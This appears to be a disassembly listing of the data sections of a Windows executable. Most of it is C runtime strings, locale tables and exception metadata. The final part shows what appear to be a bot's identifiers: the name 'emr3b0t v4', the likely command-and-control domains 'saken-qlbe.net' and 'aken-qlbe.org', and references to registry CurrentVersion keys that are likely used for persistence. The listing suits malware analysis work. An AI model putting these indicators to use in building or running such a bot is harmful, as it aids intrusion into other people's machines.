aRuntimeErrorPr db 'Runtime Error!',0Ah ; DATA XREF: __NMSG_WRITE:loc_4302DA�o
db 0Ah
db 'Program: ',0
align 4
aWinsig_c db 'winsig.c',0 ; DATA XREF: .text:004308B1�o
align 4
aGetlastactivep db 'GetLastActivePopup',0 ; DATA XREF: ___crtMessageBoxA+5F�o
align 4
aGetactivewindo db 'GetActiveWindow',0 ; DATA XREF: ___crtMessageBoxA:loc_430D4B�o
aMessageboxa db 'MessageBoxA',0 ; DATA XREF: ___crtMessageBoxA+2A�o
aOsfinfo_c db 'osfinfo.c',0 ; DATA XREF: __alloc_osfhnd+138�o
align 8
dword_43D778 dd 0FFFFFFFFh ; DATA XREF: ___crtGetStringTypeA+5�o
dd offset loc_4315B4
dd offset loc_4315BA
a_getbuf_c db '_getbuf.c',0 ; DATA XREF: __getbuf+16�o __getbuf+48�o
align 10h
aMbtowc_c db 'mbtowc.c',0 ; DATA XREF: __mbtowc_lk+21�o
align 4
; char aMb_cur_max1Mb_[]
aMb_cur_max1Mb_ db 'MB_CUR_MAX == 1 || MB_CUR_MAX == 2',0 ; DATA XREF: __mbtowc_lk+18�o
align 10h
aUngetc_c db 'ungetc.c',0 ; DATA XREF: _ungetc+16�o _ungetc_0+16�o
align 4
aSunmontuewedth db 'SunMonTueWedThuFriSat',0
align 4
aJanfebmaraprma db 'JanFebMarAprMayJunJulAugSepOctNovDec',0
align 4
aTzset_c db 'tzset.c',0 ; DATA XREF: __tzset_lk+1D1�o
; char VarName[]
VarName db 'TZ',0 ; DATA XREF: __tzset_lk+35�o
align 4
aInittime_c db 'inittime.c',0 ; DATA XREF: ___init_time+13�o
align 4
aInitnum_c db 'initnum.c',0 ; DATA XREF: ___init_numeric+1CF�o
; ___init_numeric+215�o ...
align 10h
aInitmon_c db 'initmon.c',0 ; DATA XREF: ___init_monetary+13�o
align 4
aInitctyp_c db 'initctyp.c',0 ; DATA XREF: unknown_libname_28+52�o
; unknown_libname_28+6B�o ...
align 4
aParaguay db 'Paraguay',0 ; DATA XREF: .data:00454B4C�o
align 4
aUruguay db 'Uruguay',0 ; DATA XREF: .data:00454B20�o
aChile db 'Chile',0 ; DATA XREF: .data:00454AF4�o
align 4
aEcuador db 'Ecuador',0 ; DATA XREF: .data:00454AC8�o
aArgentina db 'Argentina',0 ; DATA XREF: .data:00454A9C�o
align 4
aPeru db 'Peru',0 ; DATA XREF: .data:00454A70�o
align 10h
aColombia db 'Colombia',0 ; DATA XREF: .data:00454A44�o
align 4
aVenezuela db 'Venezuela',0 ; DATA XREF: .data:00454A18�o
align 4
aDominicanRepub db 'Dominican Republic',0 ; DATA XREF: .data:004549EC�o
align 4
aSouthAfrica db 'South Africa',0 ; DATA XREF: .data:004549C0�o
align 4
aPanama db 'Panama',0 ; DATA XREF: .data:00454994�o
align 4
aLuxembourg db 'Luxembourg',0 ; DATA XREF: .data:00454968�o
align 10h
aCostaRica db 'Costa Rica',0 ; DATA XREF: .data:0045493C�o
align 4
aSwitzerland db 'Switzerland',0 ; DATA XREF: .data:00454910�o
aGuatemala db 'Guatemala',0 ; DATA XREF: .data:004548E4�o
align 4
aCanada db 'Canada',0 ; DATA XREF: .data:004548B8�o
align 4
aSpanishModernS db 'Spanish - Modern Sort',0 ; DATA XREF: .data:00454884�o
align 4
aAustralia db 'Australia',0 ; DATA XREF: .data:00454860�o
align 10h
aEnglish db 'English',0 ; DATA XREF: .data:00454858�o
; .data:004549B8�o
aAustria db 'Austria',0 ; DATA XREF: .data:00454834�o
aGerman db 'German',0 ; DATA XREF: .data:0045482C�o
align 4
aBelgium db 'Belgium',0 ; DATA XREF: .data:00454808�o
aMexico db 'Mexico',0 ; DATA XREF: .data:004547DC�o
align 4
aSpanish db 'Spanish',0 ; DATA XREF: .data:004547D4�o
; .data:004548DC�o ...
aBasque db 'Basque',0 ; DATA XREF: .data:004547A8�o
align 4
aSweden db 'Sweden',0 ; DATA XREF: .data:00454784�o
align 10h
aSwedish db 'Swedish',0 ; DATA XREF: .data:0045477C�o
aIceland db 'Iceland',0 ; DATA XREF: .data:00454758�o
aIcelandic db 'Icelandic',0 ; DATA XREF: .data:00454750�o
align 4
aFrance db 'France',0 ; DATA XREF: .data:0045472C�o
align 4
aFrench db 'French',0 ; DATA XREF: .data:00454724�o
; .data:00454800�o ...
align 4
aFinland db 'Finland',0 ; DATA XREF: .data:00454700�o
aFinnish db 'Finnish',0 ; DATA XREF: .data:004546F8�o
aSpain db 'Spain',0 ; DATA XREF: .data:off_4546D4�o
; .data:004547B0�o ...
align 4
aSpanishTraditi db 'Spanish - Traditional Sort',0 ; DATA XREF: .data:off_4546CC�o
align 10h
aUnitedStates db 'united-states',0 ; DATA XREF: .data:00454C20�o
align 10h
aUnitedKingdom db 'united-kingdom',0 ; DATA XREF: .data:00454C18�o
align 10h
aTrinidadTobago db 'trinidad & tobago',0 ; DATA XREF: .data:00454C08�o
align 4
aSouthKorea db 'south-korea',0 ; DATA XREF: .data:00454C00�o
aSouthAfrica_0 db 'south-africa',0 ; DATA XREF: .data:00454BF8�o
align 10h
aSouthKorea_0 db 'south korea',0 ; DATA XREF: .data:00454BF0�o
aSouthAfrica_1 db 'south africa',0 ; DATA XREF: .data:00454BE8�o
align 4
aSlovak db 'slovak',0 ; DATA XREF: .data:00454BE0�o
align 4
aPuertoRico db 'puerto-rico',0 ; DATA XREF: .data:00454BD8�o
aPrChina db 'pr-china',0 ; DATA XREF: .data:00454BD0�o
align 4
aPrChina_0 db 'pr china',0 ; DATA XREF: .data:00454BC8�o
align 4
aNz db 'nz',0 ; DATA XREF: .data:00454BC0�o
align 4
aNewZealand db 'new-zealand',0 ; DATA XREF: .data:00454BB8�o
aHongKong db 'hong-kong',0 ; DATA XREF: .data:00454BB0�o
align 4
aHolland db 'holland',0 ; DATA XREF: .data:00454BA8�o
aGreatBritain db 'great britain',0 ; DATA XREF: .data:00454BA0�o
align 4
aEngland db 'england',0 ; DATA XREF: .data:00454B98�o
aCzech db 'czech',0 ; DATA XREF: .data:00454B90�o
align 4
aChina db 'china',0 ; DATA XREF: .data:00454B88�o
align 4
aBritain db 'britain',0 ; DATA XREF: .data:00454B80�o
aAmerica db 'america',0 ; DATA XREF: .data:off_454B78�o
aUsa db 'usa',0 ; DATA XREF: .data:00454E30�o
aUs db 'us',0 ; DATA XREF: .data:00454C28�o
; .data:00454E28�o
align 4
aUk db 'uk',0 ; DATA XREF: .data:00454C10�o
; .data:00454E20�o
align 10h
aSwiss db 'swiss',0 ; DATA XREF: .data:00454E18�o
align 4
aSwedishFinland db 'swedish-finland',0 ; DATA XREF: .data:00454E10�o
aSpanishVenezue db 'spanish-venezuela',0 ; DATA XREF: .data:00454E08�o
align 4
aSpanishUruguay db 'spanish-uruguay',0 ; DATA XREF: .data:00454E00�o
aSpanishPuertoR db 'spanish-puerto rico',0 ; DATA XREF: .data:00454DF8�o
aSpanishPeru db 'spanish-peru',0 ; DATA XREF: .data:00454DF0�o
align 10h
aSpanishParagua db 'spanish-paraguay',0 ; DATA XREF: .data:00454DE8�o
align 4
aSpanishPanama db 'spanish-panama',0 ; DATA XREF: .data:00454DE0�o
align 4
aSpanishNicarag db 'spanish-nicaragua',0 ; DATA XREF: .data:00454DD8�o
align 4
aSpanishModern db 'spanish-modern',0 ; DATA XREF: .data:00454DD0�o
align 4
aSpanishMexican db 'spanish-mexican',0 ; DATA XREF: .data:00454DC8�o
aSpanishHondura db 'spanish-honduras',0 ; DATA XREF: .data:00454DC0�o
align 4
aSpanishGuatema db 'spanish-guatemala',0 ; DATA XREF: .data:00454DB8�o
align 10h
aSpanishElSalva db 'spanish-el salvador',0 ; DATA XREF: .data:00454DB0�o
aSpanishEcuador db 'spanish-ecuador',0 ; DATA XREF: .data:00454DA8�o
aSpanishDominic db 'spanish-dominican republic',0 ; DATA XREF: .data:00454DA0�o
align 10h
aSpanishCostaRi db 'spanish-costa rica',0 ; DATA XREF: .data:00454D98�o
align 4
aSpanishColombi db 'spanish-colombia',0 ; DATA XREF: .data:00454D90�o
align 4
aSpanishChile db 'spanish-chile',0 ; DATA XREF: .data:00454D88�o
align 4
aSpanishBolivia db 'spanish-bolivia',0 ; DATA XREF: .data:00454D80�o
aSpanishArgenti db 'spanish-argentina',0 ; DATA XREF: .data:00454D78�o
align 4
aPortugueseBraz db 'portuguese-brazilian',0 ; DATA XREF: .data:00454D70�o
align 4
aNorwegianNynor db 'norwegian-nynorsk',0 ; DATA XREF: .data:00454D68�o
align 4
aNorwegianBokma db 'norwegian-bokmal',0 ; DATA XREF: .data:00454D60�o
align 4
aNorwegian db 'norwegian',0 ; DATA XREF: .data:00454D58�o
align 4
aItalianSwiss db 'italian-swiss',0 ; DATA XREF: .data:00454D50�o
align 4
aIrishEnglish db 'irish-english',0 ; DATA XREF: .data:00454D48�o
align 4
aGermanSwiss db 'german-swiss',0 ; DATA XREF: .data:00454D40�o
align 4
aGermanLuxembou db 'german-luxembourg',0 ; DATA XREF: .data:00454D38�o
align 4
aGermanLichtens db 'german-lichtenstein',0 ; DATA XREF: .data:00454D30�o
aGermanAustrian db 'german-austrian',0 ; DATA XREF: .data:00454D28�o
aFrenchSwiss db 'french-swiss',0 ; DATA XREF: .data:00454D20�o
align 10h
aFrenchLuxembou db 'french-luxembourg',0 ; DATA XREF: .data:00454D18�o
align 4
aFrenchCanadian db 'french-canadian',0 ; DATA XREF: .data:00454D10�o
aFrenchBelgian db 'french-belgian',0 ; DATA XREF: .data:00454D08�o
align 4
aEnglishUsa db 'english-usa',0 ; DATA XREF: .data:00454D00�o
aEnglishUs db 'english-us',0 ; DATA XREF: .data:00454CF8�o
align 4
aEnglishUk db 'english-uk',0 ; DATA XREF: .data:00454CF0�o
align 4
aEnglishTrinida db 'english-trinidad y tobago',0 ; DATA XREF: .data:00454CE8�o
align 4
aEnglishSouthAf db 'english-south africa',0 ; DATA XREF: .data:00454CE0�o
align 4
aEnglishNz db 'english-nz',0 ; DATA XREF: .data:00454CD8�o
align 4
aEnglishJamaica db 'english-jamaica',0 ; DATA XREF: .data:00454CD0�o
aEnglishIre db 'english-ire',0 ; DATA XREF: .data:00454CC8�o
aEnglishCaribbe db 'english-caribbean',0 ; DATA XREF: .data:00454CC0�o
align 4
aEnglishCan db 'english-can',0 ; DATA XREF: .data:00454CB8�o
aEnglishBelize db 'english-belize',0 ; DATA XREF: .data:00454CB0�o
align 4
aEnglishAus db 'english-aus',0 ; DATA XREF: .data:00454CA8�o
aEnglishAmerica db 'english-american',0 ; DATA XREF: .data:00454CA0�o
align 4
aDutchBelgian db 'dutch-belgian',0 ; DATA XREF: .data:00454C98�o
align 4
aChineseTraditi db 'chinese-traditional',0 ; DATA XREF: .data:00454C90�o
aChineseSingapo db 'chinese-singapore',0 ; DATA XREF: .data:00454C88�o
align 4
aChineseSimplif db 'chinese-simplified',0 ; DATA XREF: .data:00454C80�o
align 10h
aChineseHongkon db 'chinese-hongkong',0 ; DATA XREF: .data:00454C78�o
align 4
aChinese db 'chinese',0 ; DATA XREF: .data:00454C70�o
aChi db 'chi',0 ; DATA XREF: .data:00454C68�o
aChh db 'chh',0 ; DATA XREF: .data:00454C60�o
aCanadian db 'canadian',0 ; DATA XREF: .data:00454C58�o
align 10h
aBelgian db 'belgian',0 ; DATA XREF: .data:00454C50�o
aAustralian db 'australian',0 ; DATA XREF: .data:00454C48�o
align 4
aAmericanEnglis db 'american-english',0 ; DATA XREF: .data:00454C40�o
align 4
aAmericanEngl_0 db 'american english',0 ; DATA XREF: .data:00454C38�o
align 4
aAmerican db 'american',0 ; DATA XREF: .data:off_454C30�o
align 4
; char aOcp[]
aOcp db 'OCP',0 ; DATA XREF: _ProcessCodePage:loc_435AB3�o
; char aAcp[]
aAcp db 'ACP',0 ; DATA XREF: _ProcessCodePage+16�o
aChsize_c db 'chsize.c',0 ; DATA XREF: __chsize_lk+38�o
align 4
; char aSize0[]
aSize0 db 'size >= 0',0 ; DATA XREF: __chsize_lk+2C�o
align 4
; char a1Qnan[]
a1Qnan db '1#QNAN',0 ; DATA XREF: _$I10_OUTPUT:loc_43738F�o
align 10h
; char a1Inf[]
a1Inf db '1#INF',0 ; DATA XREF: _$I10_OUTPUT+19B�o
align 4
; char a1Ind[]
a1Ind db '1#IND',0 ; DATA XREF: _$I10_OUTPUT+168�o
align 10h
; char a1Snan[]
a1Snan db '1#SNAN',0 ; DATA XREF: _$I10_OUTPUT+125�o
align 4
aHMmSs db 'H:mm:ss',0 ; DATA XREF: .data:00454EE8�o
aDdddMmmmDdYyyy db 'dddd, MMMM dd, yyyy',0 ; DATA XREF: .data:00454EE4�o
aMDYy db 'M/d/yy',0 ; DATA XREF: .data:00454EE0�o
align 4
aPm_2 db 'PM',0 ; DATA XREF: .data:00454EDC�o
align 10h
aAm_0 db 'AM',0 ; DATA XREF: .data:00454ED8�o
align 4
aDecember db 'December',0 ; DATA XREF: .data:00454ED4�o
align 10h
aNovember db 'November',0 ; DATA XREF: .data:00454ED0�o
align 4
aOctober db 'October',0 ; DATA XREF: .data:00454ECC�o
aSeptember db 'September',0 ; DATA XREF: .data:00454EC8�o
align 10h
aAugust db 'August',0 ; DATA XREF: .data:00454EC4�o
align 4
aJuly db 'July',0 ; DATA XREF: .data:00454EC0�o
align 10h
aJune db 'June',0 ; DATA XREF: .data:00454EBC�o
align 4
aApril db 'April',0 ; DATA XREF: .data:00454EB4�o
align 10h
aMarch db 'March',0 ; DATA XREF: .data:00454EB0�o
align 4
aFebruary db 'February',0 ; DATA XREF: .data:00454EAC�o
align 4
aJanuary db 'January',0 ; DATA XREF: .data:00454EA8�o
aDec db 'Dec',0 ; DATA XREF: .data:00454EA4�o
aNov db 'Nov',0 ; DATA XREF: .data:00454EA0�o
aOct db 'Oct',0 ; DATA XREF: .data:00454E9C�o
aSep db 'Sep',0 ; DATA XREF: .data:00454E98�o
aAug db 'Aug',0 ; DATA XREF: .data:00454E94�o
aJul db 'Jul',0 ; DATA XREF: .data:00454E90�o
aJun db 'Jun',0 ; DATA XREF: .data:00454E8C�o
aMay db 'May',0 ; DATA XREF: .data:00454E88�o
; .data:00454EB8�o
aApr db 'Apr',0 ; DATA XREF: .data:00454E84�o
aMar db 'Mar',0 ; DATA XREF: .data:00454E80�o
aFeb db 'Feb',0 ; DATA XREF: .data:00454E7C�o
aJan db 'Jan',0 ; DATA XREF: .data:00454E78�o
aSaturday db 'Saturday',0 ; DATA XREF: .data:00454E74�o
align 4
aFriday db 'Friday',0 ; DATA XREF: .data:00454E70�o
align 10h
aThursday db 'Thursday',0 ; DATA XREF: .data:00454E6C�o
align 4
aWednesday db 'Wednesday',0 ; DATA XREF: .data:00454E68�o
align 4
aTuesday db 'Tuesday',0 ; DATA XREF: .data:00454E64�o
aMonday db 'Monday',0 ; DATA XREF: .data:00454E60�o
align 4
aSunday db 'Sunday',0 ; DATA XREF: .data:00454E5C�o
align 10h
aSat db 'Sat',0 ; DATA XREF: .data:00454E58�o
aFri db 'Fri',0 ; DATA XREF: .data:00454E54�o
aThu db 'Thu',0 ; DATA XREF: .data:00454E50�o
aWed db 'Wed',0 ; DATA XREF: .data:00454E4C�o
aTue db 'Tue',0 ; DATA XREF: .data:00454E48�o
aMon db 'Mon',0 ; DATA XREF: .data:00454E44�o
aSun db 'Sun',0 ; DATA XREF: .data:off_454E40�o
; char aAP[]
aAP db 'a/p',0 ; DATA XREF: __store_winword:loc_438933�o
; char aAmPm[]
aAmPm db 'am/pm',0 ; DATA XREF: __store_winword:loc_438913�o
align 4
aInithelp_c db 'inithelp.c',0 ; DATA XREF: sub_438C60+9C�o
; sub_438C60+F1�o
align 8
dword_43E048 dd 0FFFFFFFFh ; DATA XREF: ___crtGetStringTypeW+5�o
dd offset loc_439027
dd offset loc_43902D
dd 0FFFFFFFFh
dd offset loc_4390A6
dd offset loc_4390AC
aWtombenv_c db 'wtombenv.c',0 ; DATA XREF: ___wtomb_environ+44�o
align 10h
dword_43E070 dd 0FFFFFFFFh ; DATA XREF: ___crtGetLocaleInfoW+5�o
dd offset loc_439ADD
dd offset loc_439AE3
align 10h
dword_43E080 dd 0FFFFFFFFh ; DATA XREF: ___crtGetLocaleInfoA+5�o
dd offset loc_439C7F
dd offset loc_439C85
aA_cmp_c db 'a_cmp.c',0 ; DATA XREF: ___crtCompareStringA+17F�o
; char aCchcount10Cchc[]
aCchcount10Cchc db 'cchCount1==0 && cchCount2==1 || cchCount1==1 && cchCount2==0',0
; DATA XREF: ___crtCompareStringA:loc_439EA3�o
align 8
dword_43E0D8 dd 0FFFFFFFFh ; DATA XREF: ___crtCompareStringA+5�o
dd offset loc_43A00F
dd offset loc_43A015
dd 0FFFFFFFFh
dd offset loc_43A0AD
dd offset loc_43A0B3
aSetenv_c db 'setenv.c',0 ; DATA XREF: ___crtsetenv+B2�o
; ___crtsetenv+F2�o ...
align 4
aStringTooLong db 'string too long',0 ; DATA XREF: sub_43A6C0+1F�o
dd offset dword_43E208
off_43E110 dd offset sub_43A840 ; DATA XREF: sub_43A720+44�o
; sub_43A7E0+1F�o ...
dd offset sub_43A790 ; ?what@runtime_error@std@@UBEPBDXZ
; doubtful name
dd offset sub_43A7B0
dd offset dword_43E258
off_43E120 dd offset sub_43A960 ; DATA XREF: sub_43A870+16�o
; sub_43A910+A�o ...
dd offset sub_43A790 ; ?what@runtime_error@std@@UBEPBDXZ
; doubtful name
dd offset sub_43A930
aInvalidStringP db 'invalid string position',0 ; DATA XREF: sub_43A9C0+1F�o
dd offset dword_43E2A8
off_43E148 dd offset sub_43AAA0 ; DATA XREF: sub_43AA20+16�o
; sub_43AA50+A�o ...
dd offset sub_43A790 ; ?what@runtime_error@std@@UBEPBDXZ
; doubtful name
dd offset sub_43AA70
dd offset dword_43E2D8
off_43E158 dd offset ??_Gexception@@UAEPAXI@Z ; DATA XREF: .text:0043B15A�o
; exception::exception(char const * const &)+C�o ...
; exception::`scalar deleting destructor'(uint)
dd offset ?what@exception@@UBEPBDXZ ; exception::what(void)
aUnknownExcepti db 'Unknown exception',0 ; DATA XREF: exception::what(void):loc_43B338�o
align 4
dd offset dword_43E320
off_43E178 dd offset ??_Gtype_info@@UAEPAXI@Z
; DATA XREF: type_info::~type_info(void)+A�o
; type_info::type_info(type_info const &)+A�o ...
; type_info::`scalar deleting destructor'(uint)
align 10h
dword_43E180 dd 0E06D7363h, 1, 2 dup(0) ; DATA XREF: _CxxThrowException(x,x)+D�o
dd 3, 19930520h, 2 dup(0)
dword_43E1A0 dd 0FFFFFFFFh ; DATA XREF: ___crtLCMapStringW+5�o
dd offset loc_43B7BF
dd offset loc_43B7C5
dd 0FFFFFFFFh
dd offset loc_43B864
dd offset loc_43B86A
off_43E1B8 dd offset off_4551F0 ; DATA XREF: .rdata:0043E1EC�o
; .rdata:0043E240�o ...
dd 2 dup(0)
dd 0FFFFFFFFh, 2 dup(0)
off_43E1D0 dd offset off_455208 ; DATA XREF: .rdata:off_43E1E8�o
; .rdata:0043E23C�o ...
dd 1, 0
dd 0FFFFFFFFh, 2 dup(0)
off_43E1E8 dd offset off_43E1D0 ; DATA XREF: .rdata:0043E204�o
dd offset off_43E1B8
dword_43E1F0 dd 4 dup(0) ; DATA XREF: .rdata:0043E218�o
dd 2
dd offset off_43E1E8
dword_43E208 dd 3 dup(0) ; DATA XREF: .rdata:0043E10C�o
dd offset off_455208
dd offset dword_43E1F0+8
align 10h
off_43E220 dd offset off_455228 ; DATA XREF: .rdata:off_43E238�o
dd 2, 0
dd 0FFFFFFFFh, 2 dup(0)
off_43E238 dd offset off_43E220 ; DATA XREF: .rdata:0043E254�o
dd offset off_43E1D0
dd offset off_43E1B8
dd 0
db 0 ; DATA XREF: .rdata:0043E268�o
db 0
db 0
db 0
db 0
db 0
db 0
db 0
dd 3
dd offset off_43E238
dword_43E258 dd 3 dup(0) ; DATA XREF: .rdata:0043E11C�o
dd offset off_455228
dd offset unk_43E248
align 10h
off_43E270 dd offset off_455248 ; DATA XREF: .rdata:off_43E288�o
dd 2, 0
dd 0FFFFFFFFh, 2 dup(0)
off_43E288 dd offset off_43E270 ; DATA XREF: .rdata:0043E2A4�o
dd offset off_43E1D0
dd offset off_43E1B8
dd 0
db 0 ; DATA XREF: .rdata:0043E2B8�o
db 0
db 0
db 0
db 0
db 0
db 0
db 0
dd 3
dd offset off_43E288
dword_43E2A8 dd 3 dup(0) ; DATA XREF: .rdata:0043E144�o
dd offset off_455248
dd offset unk_43E298
off_43E2BC dd offset off_43E1B8 ; DATA XREF: .rdata:0043E2D4�o
dword_43E2C0 dd 4 dup(0) ; DATA XREF: .rdata:0043E2E8�o
dd 1
dd offset off_43E2BC
dword_43E2D8 dd 3 dup(0) ; DATA XREF: .rdata:0043E154�o
dd offset off_4551F0
dd offset dword_43E2C0+8
align 10h
off_43E2F0 dd offset off_455268 ; DATA XREF: .rdata:off_43E308�o
dd 2 dup(0)
dd 0FFFFFFFFh, 2 dup(0)
off_43E308 dd offset off_43E2F0 ; DATA XREF: .rdata:0043E31C�o
dword_43E30C dd 3 dup(0) ; DATA XREF: .rdata:0043E330�o
dd 1
dd offset off_43E308
dword_43E320 dd 3 dup(0) ; DATA XREF: .rdata:0043E174�o
dd offset off_455268
dd offset dword_43E30C+4
align 8
dword_43E338 dd 19930520h, 2 ; DATA XREF: .text:loc_43BA8F�o
dd offset dword_43E358
dd 5 dup(0)
dword_43E358 dd 0FFFFFFFFh ; DATA XREF: .rdata:0043E340�o
dd offset sub_43BA78
dd 0
dd offset sub_43BA70
dword_43E368 dd 19930520h, 2 ; DATA XREF: .text:loc_43BAA9�o
dd offset dword_43E388
dd 5 dup(0)
dword_43E388 dd 0FFFFFFFFh ; DATA XREF: .rdata:0043E370�o
dd offset sub_43BA99
dd 0
dd offset sub_43BAA1
dword_43E398 dd 19930520h, 2 ; DATA XREF: .text:loc_43BAB4�o
dd offset dword_43E3B8
dd 1
dd offset dword_43E3C8
dd 3 dup(0)
dword_43E3B8 dd 0FFFFFFFFh, 0 ; DATA XREF: .rdata:0043E3A0�o
dd 0FFFFFFFFh, 0
dword_43E3C8 dd 2 dup(0) ; DATA XREF: .rdata:0043E3A8�o
dd 2 dup(1)
dd offset dword_43E3E0
align 10h
dword_43E3E0 dd 3 dup(0) ; DATA XREF: .rdata:0043E3D8�o
dd offset loc_40E1B5
dword_43E3F0 dd 0 ; DATA XREF: .rdata:0043E45C�o
; .rdata:0043E4C8�o ...
dd offset off_4551F0
dd 0
dd 0FFFFFFFFh, 0
dd 0Ch
dd offset ??0exception@@QAE@ABV0@@Z ; exception::exception(exception const &)
dword_43E40C dd 2 dup(0) ; DATA XREF: .rdata:0043E458�o
; .rdata:0043E4C4�o ...
dd offset off_455208
dd 0
dd 0FFFFFFFFh, 0
dd 1Ch
dd offset sub_43A720
dword_43E42C dd 2 dup(0) ; DATA XREF: .rdata:0043E454�o
dd offset off_455228
dd 0
dd 0FFFFFFFFh, 0
dd 1Ch
dd offset sub_43A990
align 10h
dword_43E450 dd 3 ; DATA XREF: .rdata:0043E46C�o
dd offset dword_43E42C+4
dd offset dword_43E40C+4
dd offset dword_43E3F0
dword_43E460 dd 0 ; DATA XREF: sub_43A6C0+3F�o
; sub_43A930+15�o
dd offset sub_43A910
dd 0
dd offset dword_43E450
dword_43E470 dd 19930520h, 1 ; DATA XREF: SEH_43A6C0�o
dd offset dword_43E490
dd 5 dup(0)
dword_43E490 dd 0FFFFFFFFh ; DATA XREF: .rdata:0043E478�o
dd offset sub_43BAC0
dword_43E498 dd 19930520h, 1 ; DATA XREF: SEH_43A720�o
dd offset dword_43E4B8
dd 5 dup(0)
dword_43E4B8 dd 0FFFFFFFFh ; DATA XREF: .rdata:0043E4A0�o
dd offset sub_43BAE0
dword_43E4C0 dd 2 ; DATA XREF: .rdata:0043E4DC�o
dd offset dword_43E40C+4
dd offset dword_43E3F0
align 10h
dword_43E4D0 dd 0 ; DATA XREF: sub_43A7B0+15�o
dd offset sub_43A7E0
dd 0
dd offset dword_43E4C0
dword_43E4E0 dd 19930520h, 1 ; DATA XREF: SEH_43A7E0�o
dd offset dword_43E500
dd 5 dup(0)
dword_43E500 dd 0FFFFFFFFh ; DATA XREF: .rdata:0043E4E8�o
dd offset sub_43BB00
dword_43E508 dd 19930520h, 1 ; DATA XREF: SEH_43A8A0�o
dd offset dword_43E528
dd 5 dup(0)
dword_43E528 dd 0FFFFFFFFh ; DATA XREF: .rdata:0043E510�o
dd offset sub_43BB20
dword_43E530 dd 0 ; DATA XREF: .rdata:0043E554�o
dd offset off_455248
dd 0
dd 0FFFFFFFFh, 0
dd 1Ch
dd offset sub_43AAD0
align 10h
dword_43E550 dd 3 ; DATA XREF: .rdata:0043E56C�o
dd offset dword_43E530
dd offset dword_43E40C+4
dd offset dword_43E3F0
dword_43E560 dd 0 ; DATA XREF: sub_43A9C0+3F�o
; sub_43AA70+15�o
dd offset sub_43AA50
dd 0
dd offset dword_43E550
dword_43E570 dd 19930520h, 1 ; DATA XREF: SEH_43A9C0�o
dd offset dword_43E590
dd 5 dup(0)
dword_43E590 dd 0FFFFFFFFh ; DATA XREF: .rdata:0043E578�o
dd offset sub_43BB40
_rdata ends
; Section 3. (virtual address 0003F000)
; Virtual size : 000B5C3D ( 744509.)
; Section size in file : 000B5C3D ( 744509.)
; Offset to raw data for section: 0003F000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_data segment para public 'DATA' use32
assume cs:_data
;org 43F000h
dword_43F000 dd 0 ; DATA XREF: __cinit+29�o
dd offset loc_4013FF
dd offset sub_40DCBD
dd offset sub_40E2C6
dd offset sub_40F144
dd offset unknown_libname_35 ; Microsoft VisualC 2-8/net runtime
dword_43F018 dd 0 ; DATA XREF: __cinit+24�o
dword_43F01C dd 0 ; DATA XREF: __cinit+17�o
dd offset ___onexitinit
dd offset ___initstdio
dd offset ___initmbctable
dd offset ?__CxxSetUnhandledExceptionFilter@@YAXXZ ; __CxxSetUnhandledExceptionFilter(void)
dword_43F030 dd 0 ; DATA XREF: __cinit:loc_41EAD2�o
dword_43F034 dd 0 ; DATA XREF: _doexit+76�o
dd offset ___endstdio
dword_43F03C dd 0 ; DATA XREF: _doexit:loc_41EBF1�o
dword_43F040 dd 0 ; DATA XREF: _doexit+88�o
dd offset ?__CxxRestoreUnhandledExceptionFilter@@YAXXZ ; __CxxRestoreUnhandledExceptionFilter(void)
dword_43F048 dd 2 dup(0) ; DATA XREF: _doexit:loc_41EC03�o
dword_43F050 dd 80000002h ; DATA XREF: sub_401000+7�o
dd offset aSoftwareMicr_0 ; "Software\\Microsoft\\Windows\\CurrentVersi"...
dd 80000002h
dd offset aSoftwareMicr_1 ; "Software\\Microsoft\\Windows\\CurrentVersi"...
dd 80000001h
dd offset aSoftwareMicr_0 ; "Software\\Microsoft\\Windows\\CurrentVersi"...
dword_43F068 dd 6272h ; DATA XREF: sub_401000+63�o
; sub_4010AB+B�o
dword_43F06C dd 1F90h ; DATA XREF: WinMain(x,x,x,x)+4A4�r
; WinMain(x,x,x,x)+539�r
dword_43F070 dd 1F91h ; DATA XREF: WinMain(x,x,x,x)+585�r
dword_43F074 dd 7E4h ; DATA XREF: sub_401CC7:loc_404806�r
dword_43F078 dd 45h ; DATA XREF: sub_401CC7+2079�r
; sub_40C12D+3B�r
dword_43F07C dd 7D1h ; DATA XREF: sub_401CC7:loc_403E2E�r
; sub_40C12D:loc_40C51E�r
dword_43F080 dd 201h ; DATA XREF: sub_401CC7:loc_403FBA�r
word_43F084 dw 7C7h ; DATA XREF: sub_401CC7:loc_404929�r
align 4
dword_43F088 dd 1 ; DATA XREF: sub_401CC7+646�r
dword_43F08C dd 1 ; DATA XREF: WinMain(x,x,x,x)+13D�r
dword_43F090 dd 1 ; DATA XREF: WinMain(x,x,x,x):loc_40175C�r
; sub_4190F6+C�r
byte_43F094 db 2Eh ; DATA XREF: sub_401CC7+A7A�r
; sub_401CC7+B34�r ...
align 4
dword_43F098 dd 5 ; DATA XREF: sub_40B06A+3A�r
; sub_40B06A+60�r ...
; int dword_43F09C
dword_43F09C dd 4 ; DATA XREF: sub_4019E7+78�r
; sub_401CC7+270�r ...
; int dword_43F0A0
dword_43F0A0 dd 1 ; DATA XREF: sub_4019E7+72�r
; sub_401CC7+26A�r
; char aTrb[]
aTrb db 'trb',0 ; DATA XREF: WinMain(x,x,x,x)+5D�o
; sub_401CC7:loc_40468B�o ...
aEmr3b0tV4 db 'emr3b0t v4',0 ; DATA XREF: sub_401CC7:loc_404B30�o
align 4
; char a3zef[]
a3zef db '3zef',0 ; DATA XREF: sub_401CC7+7EA3�o
; sub_401CC7+7F72�o
align 4
; char Source[]
Source db 'saken-qlbe.net',0 ; DATA XREF: WinMain(x,x,x,x)+490�o
; WinMain(x,x,x,x)+52A�o
align 4
byte_43F0CC db 33h ; DATA XREF: sub_401B4F+28�r
; sub_401B4F+30�o
aZef3 db 'zef3',0
align 4
; char a0[]
a0 db '#0#',0 ; DATA XREF: WinMain(x,x,x,x)+4B0�o
; WinMain(x,x,x,x)+540�o ...
; char a7lome[]
a7lome db '7lome',0 ; DATA XREF: WinMain(x,x,x,x)+4C7�o
; WinMain(x,x,x,x)+552�o
align 10h
; char byte_43F0E0
byte_43F0E0 db 73h ; DATA XREF: WinMain(x,x,x,x):loc_401983�r
; WinMain(x,x,x,x)+576�o
aAkenQlbe_org db 'aken-qlbe.org',0
align 10h
; char a1[]
a1 db '#1#',0 ; DATA XREF: WinMain(x,x,x,x)+58C�o
; char a7lome_0[]
a7lome_0 db '7lome',0 ; DATA XREF: WinMain(x,x,x,x)+59E�o
align 4
; char Str[]
